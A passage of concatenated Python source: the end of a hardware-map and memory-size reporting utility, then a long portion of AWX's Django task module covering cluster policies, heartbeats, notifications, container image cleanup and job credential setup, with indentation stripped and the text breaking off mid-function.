for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists.
# Specifically, when using process isolation
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
